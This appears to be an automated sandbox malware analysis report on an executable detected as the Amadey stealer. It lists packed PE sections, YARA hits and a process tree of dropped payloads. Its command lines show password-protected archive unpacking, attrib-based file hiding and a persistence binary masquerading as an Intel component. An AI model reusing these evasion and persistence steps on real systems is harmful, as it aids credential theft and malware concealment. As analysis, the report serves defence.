                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add cl, byte ptr [edx]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      inc eax
                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [ecx], cl
                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add al, 0Ah
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      or ecx, dword ptr [edx]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      push es
                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x344.rsrc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x31cae40x10syfpipoa
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x31ca940x18syfpipoa
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                      0x10000x680000x2de000f8a499b6448a9fb97322d52eceec177False0.9983555432561307data7.986233657501117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .rsrc0x690000x3440x400982623c07c43a8169da5c3bd55ce4d06False0.4345703125data5.395849414192414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      syfpipoa0x6b0000x2b20000x2b1c00de89f444313838c39a8a4f882c2748bcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      kqlprvhw0x31d0000x10000x40028101f3bd65ae0792778adbc9af325e8False0.7939453125data6.124208055651814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .taggant0x31e0000x30000x2200130e21ef41e474edd54e9d5d1c151e06False0.06330422794117647DOS executable (COM)0.7936231932797173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                      RT_MANIFEST0x690700x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                                                                                                                      RT_MANIFEST0x691c40x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                      kernel32.dlllstrcpy
                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                      EnglishUnited States
                                                                                                                                                                                                      Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                      Start time:18:20:12
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                      Imagebase:0x660000
                                                                                                                                                                                                      File size:3'028'480 bytes
                                                                                                                                                                                                      MD5 hash:524AFF0AE21CF7D4731596E8F3967E32
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.268839327195.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                      Start time:18:20:13
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      Imagebase:0x9c0000
                                                                                                                                                                                                      File size:3'028'480 bytes
                                                                                                                                                                                                      MD5 hash:524AFF0AE21CF7D4731596E8F3967E32
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.268855891646.0000000005400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 47%, ReversingLabs
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                      Start time:18:20:13
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                      Imagebase:0x9c0000
                                                                                                                                                                                                      File size:3'028'480 bytes
                                                                                                                                                                                                      MD5 hash:524AFF0AE21CF7D4731596E8F3967E32
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.268857006626.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                      Start time:18:21:00
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      Imagebase:0x9c0000
                                                                                                                                                                                                      File size:3'028'480 bytes
                                                                                                                                                                                                      MD5 hash:524AFF0AE21CF7D4731596E8F3967E32
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.269317871785.0000000004920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                      Start time:18:21:08
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe"
                                                                                                                                                                                                      Imagebase:0xb0000
                                                                                                                                                                                                      File size:2'955'776 bytes
                                                                                                                                                                                                      MD5 hash:4765874B881A2BCE3AAEFB16805EF1A5
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.269406632525.0000000005080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                      Start time:18:21:14
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                                                                                                                                                      Imagebase:0x630000
                                                                                                                                                                                                      File size:2'955'776 bytes
                                                                                                                                                                                                      MD5 hash:4765874B881A2BCE3AAEFB16805EF1A5
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.269465852321.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                      Start time:18:21:14
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe"
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      File size:4'438'776 bytes
                                                                                                                                                                                                      MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 88%, ReversingLabs
                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                      Start time:18:21:15
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                      Imagebase:0x630000
                                                                                                                                                                                                      File size:2'955'776 bytes
                                                                                                                                                                                                      MD5 hash:4765874B881A2BCE3AAEFB16805EF1A5
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.269472681805.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                      Start time:18:21:19
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                      Imagebase:0x7ff6f8ee0000
                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                      Start time:18:21:19
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff673430000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                      Start time:18:21:19
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:mode 65,10
                                                                                                                                                                                                      Imagebase:0x7ff653ff0000
                                                                                                                                                                                                      File size:33'280 bytes
                                                                                                                                                                                                      MD5 hash:59D1ED51ACB8C3D50F1306FD75F20E99
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                      Start time:18:21:19
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                                      Imagebase:0xb50000
                                                                                                                                                                                                      File size:468'992 bytes
                                                                                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                      Start time:18:21:19
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
                                                                                                                                                                                                      Imagebase:0x1e0000
                                                                                                                                                                                                      File size:727'552 bytes
                                                                                                                                                                                                      MD5 hash:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 71%, ReversingLabs
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                      Start time:18:21:19
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff673430000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                      Start time:18:21:20
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                      Imagebase:0xb50000
                                                                                                                                                                                                      File size:468'992 bytes
                                                                                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                      Start time:18:21:20
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                      Imagebase:0xb50000
                                                                                                                                                                                                      File size:468'992 bytes
                                                                                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                      Start time:18:21:21
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                      Imagebase:0xb50000
                                                                                                                                                                                                      File size:468'992 bytes
                                                                                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                      Start time:18:21:21
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                      Imagebase:0xb50000
                                                                                                                                                                                                      File size:468'992 bytes
                                                                                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                      Start time:18:21:21
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                      Imagebase:0xb50000
                                                                                                                                                                                                      File size:468'992 bytes
                                                                                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                      Start time:18:21:22
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
                                                                                                                                                                                                      Imagebase:0x1e0000
                                                                                                                                                                                                      File size:727'552 bytes
                                                                                                                                                                                                      MD5 hash:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                      Start time:18:21:22
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                      Imagebase:0xb50000
                                                                                                                                                                                                      File size:468'992 bytes
                                                                                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                      Start time:18:21:22
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                      Imagebase:0xb50000
                                                                                                                                                                                                      File size:468'992 bytes
                                                                                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                      Start time:18:21:22
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:attrib +H "in.exe"
                                                                                                                                                                                                      Imagebase:0x7ff63f370000
                                                                                                                                                                                                      File size:23'040 bytes
                                                                                                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                      Start time:18:21:22
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"in.exe"
                                                                                                                                                                                                      Imagebase:0x7ff7ec690000
                                                                                                                                                                                                      File size:1'827'328 bytes
                                                                                                                                                                                                      MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                      Imagebase:0x7ff63f370000
                                                                                                                                                                                                      File size:23'040 bytes
